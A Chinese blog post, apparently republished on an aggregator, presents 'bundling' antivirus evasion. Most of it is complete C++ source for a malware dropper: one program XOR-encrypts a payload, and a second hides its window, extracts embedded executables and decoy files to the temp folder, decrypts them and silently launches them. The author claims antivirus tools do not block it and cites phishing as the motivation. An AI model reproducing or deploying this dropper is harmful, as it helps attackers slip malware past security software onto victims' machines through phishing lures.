浅谈捆绑免杀技术

2024-04-07 00:20
文章标签 技术 浅谈 免杀 捆绑

本文主要是介绍浅谈捆绑免杀技术,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

    • 前记
    • 浅谈原理
    • 代码汇总
    • 后记
    • reference

前记

看到奇安信某篇钓鱼捆绑技术的文章后得到启发,于是开始学习探索

浅谈原理

将exe和pdf或者其他格式的文件写到资源节中,执行捆绑文件的时候动态获取并解密资源节的内容保存到磁盘的tmp目录,最后执行保存到磁盘的文件即可

代码汇总

加密文件

#include<windows.h>  
#include <iostream>  
using namespace std;
int main(int argc, char* argv[])
{int r = 100;HANDLE file = CreateFileA(argv[1], GENERIC_READ, NULL, NULL, OPEN_EXISTING, NULL, NULL);DWORD64 size = GetFileSize(file, NULL);char* bytes =(char*) HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, size);ReadFile(file, bytes, size, NULL, NULL);HANDLE file2 = CreateFileA("sec.txt", GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);LPVOID res = bytes;int b;DWORD64 c = size;srand(r);while (c--) {b = rand() % 255 + 1;//1-255*bytes^= b;bytes++;}if (!WriteFile(file2, res, size, NULL, NULL)) {std::cerr << "Error writing to file" << std::endl;DWORD aaa=GetLastError();return 1;}CloseHandle(file2);CloseHandle(file);return 0;
}

捆绑文件

#include <iostream>
#include <windows.h>int r=100;
using namespace std;
static int num = 0;void getreal(char *dest,char *src, DWORD num)
{int b;srand(r);while (num--) {b = rand() % 255 + 1;//1-255*dest++ = *src++^b;}
}
void HideWindow() {HWND hwnd = GetForegroundWindow();if (hwnd) {ShowWindow(hwnd, SW_HIDE);}
}
void EnumTypesFunc(HMODULE hModule, LPTSTR lpType, LPTSTR lParam) {num++;DWORD dwNum = WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, NULL, 0, NULL, FALSE);char* fileType =new char[dwNum];WideCharToMultiByte(CP_OEMCP, NULL, lpType, -1, fileType, dwNum, NULL, FALSE);CHAR PathFileName[MAX_PATH] = { 0 };CHAR FileName[MAX_PATH] = { 0 };HRSRC Resource = FindResourceA(NULL, MAKEINTRESOURCEA(100 + num), fileType);HGLOBAL ResourceGlobal = LoadResource(NULL, Resource);DWORD FileSize = SizeofResource(NULL, Resource);LPVOID PFILE = LockResource(ResourceGlobal);GetModuleFileNameA(NULL, PathFileName, MAX_PATH);strcpy_s(FileName, strrchr(PathFileName, '\\') + 1);string FileNameFinal = FileName;FileNameFinal.replace(FileNameFinal.rfind('.'), 4, "." + string(fileType));CHAR czTempPath[MAX_PATH] = { 0 };GetTempPathA(MAX_PATH, czTempPath);FileNameFinal = czTempPath + FileNameFinal;strcpy_s(FileName, FileNameFinal.c_str());HANDLE FILE = CreateFileA(FileName, FILE_ALL_ACCESS, 0, NULL, CREATE_ALWAYS, 0, NULL);DWORD dwSize;char *real= new char[FileSize];getreal(real,(char *)PFILE,FileSize);WriteFile(FILE, real, FileSize, &dwSize, NULL);CloseHandle(FILE);Sleep(500);SHELLEXECUTEINFOA shellexecute = { 0 };shellexecute.cbSize = sizeof(shellexecute);shellexecute.lpFile = FileName;shellexecute.nShow = SW_SHOW;ShellExecuteExA(&shellexecute);
}int main(int argc, char* argv[])
{HideWindow();EnumResourceTypes(NULL,(ENUMRESTYPEPROC)EnumTypesFunc,0);
}

因为对资源节内容进行了加密,所以这里资源节里完全没有PE特征

在这里插入图片描述

后记

由于解析文件后缀依靠填写的文件真实格式,因此可能被杀软检测到资源节的exe关键字,建议宏定义或者加密处理(懒得改代码了)。经过测试杀软均不拦截且正常运行,当然如果exe文件落地后报毒则和捆绑本身操作无关

reference

https://forum.butian.net/share/1778
https://github.com/testxxxzzz/Bundler-bypass/blob/main/Bundler_C/main.cpp

这篇关于浅谈捆绑免杀技术的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/881216

相关文章

【专题】2024飞行汽车技术全景报告合集PDF分享(附原数据表)

原文链接: https://tecdat.cn/?p=37628 6月16日,小鹏汇天旅航者X2在北京大兴国际机场临空经济区完成首飞,这也是小鹏汇天的产品在京津冀地区进行的首次飞行。小鹏汇天方面还表示,公司准备量产,并计划今年四季度开启预售小鹏汇天分体式飞行汽车,探索分体式飞行汽车城际通勤。阅读原文,获取专题报告合集全文,解锁文末271份飞行汽车相关行业研究报告。 据悉,业内人士对飞行汽车行业

浅谈主机加固,六种有效的主机加固方法

在数字化时代,数据的价值不言而喻,但随之而来的安全威胁也日益严峻。从勒索病毒到内部泄露,企业的数据安全面临着前所未有的挑战。为了应对这些挑战,一种全新的主机加固解决方案应运而生。 MCK主机加固解决方案,采用先进的安全容器中间件技术,构建起一套内核级的纵深立体防护体系。这一体系突破了传统安全防护的局限,即使在管理员权限被恶意利用的情况下,也能确保服务器的安全稳定运行。 普适主机加固措施:

金融业开源技术 术语

金融业开源技术  术语 1  范围 本文件界定了金融业开源技术的常用术语。 本文件适用于金融业中涉及开源技术的相关标准及规范性文件制定和信息沟通等活动。

AI(文生语音)-TTS 技术线路探索学习:从拼接式参数化方法到Tacotron端到端输出

AI(文生语音)-TTS 技术线路探索学习:从拼接式参数化方法到Tacotron端到端输出 在数字化时代,文本到语音(Text-to-Speech, TTS)技术已成为人机交互的关键桥梁,无论是为视障人士提供辅助阅读,还是为智能助手注入声音的灵魂,TTS 技术都扮演着至关重要的角色。从最初的拼接式方法到参数化技术,再到现今的深度学习解决方案,TTS 技术经历了一段长足的进步。这篇文章将带您穿越时

系统架构设计师: 信息安全技术

简简单单 Online zuozuo: 简简单单 Online zuozuo 简简单单 Online zuozuo 简简单单 Online zuozuo 简简单单 Online zuozuo :本心、输入输出、结果 简简单单 Online zuozuo : 文章目录 系统架构设计师: 信息安全技术前言信息安全的基本要素:信息安全的范围:安全措施的目标:访问控制技术要素:访问控制包括:等保

前端技术(七)——less 教程

一、less简介 1. less是什么? less是一种动态样式语言,属于css预处理器的范畴,它扩展了CSS语言,增加了变量、Mixin、函数等特性,使CSS 更易维护和扩展LESS 既可以在 客户端 上运行 ,也可以借助Node.js在服务端运行。 less的中文官网:https://lesscss.cn/ 2. less编译工具 koala 官网 http://koala-app.

Spring的设计⽬标——《Spring技术内幕》

读《Spring技术内幕》第二版,计文柯著。 如果我们要简要地描述Spring的设计⽬标,可以这么说,Spring为开发者提供的是⼀个⼀站式的轻量级应⽤开发框架(平台)。 作为平台,Spring抽象了我们在 许多应⽤开发中遇到的共性问题;同时,作为⼀个轻量级的应⽤开发框架,Spring和传统的J2EE开发相⽐,有其⾃⾝的特点。 通过这些⾃⾝的特点,Spring充分体现了它的设计理念:在

java线程深度解析(六)——线程池技术

http://blog.csdn.net/Daybreak1209/article/details/51382604 一种最为简单的线程创建和回收的方法: [html]  view plain copy new Thread(new Runnable(){                @Override               public voi

java线程深度解析(二)——线程互斥技术与线程间通信

http://blog.csdn.net/daybreak1209/article/details/51307679      在java多线程——线程同步问题中,对于多线程下程序启动时出现的线程安全问题的背景和初步解决方案已经有了详细的介绍。本文将再度深入解析对线程代码块和方法的同步控制和多线程间通信的实例。 一、再现多线程下安全问题 先看开启两条线程,分别按序打印字符串的

浅谈PHP5中垃圾回收算法(Garbage Collection)的演化

前言 PHP是一门托管型语言,在PHP编程中程序员不需要手工处理内存资源的分配与释放(使用C编写PHP或Zend扩展除外),这就意味着PHP本身实现了垃圾回收机制(Garbage Collection)。现在如果去PHP官方网站(php.net)可以看到,目前PHP5的两个分支版本PHP5.2和PHP5.3是分别更新的,这是因为许多项目仍然使用5.2版本的PHP,而5.3版本对5.2并不是完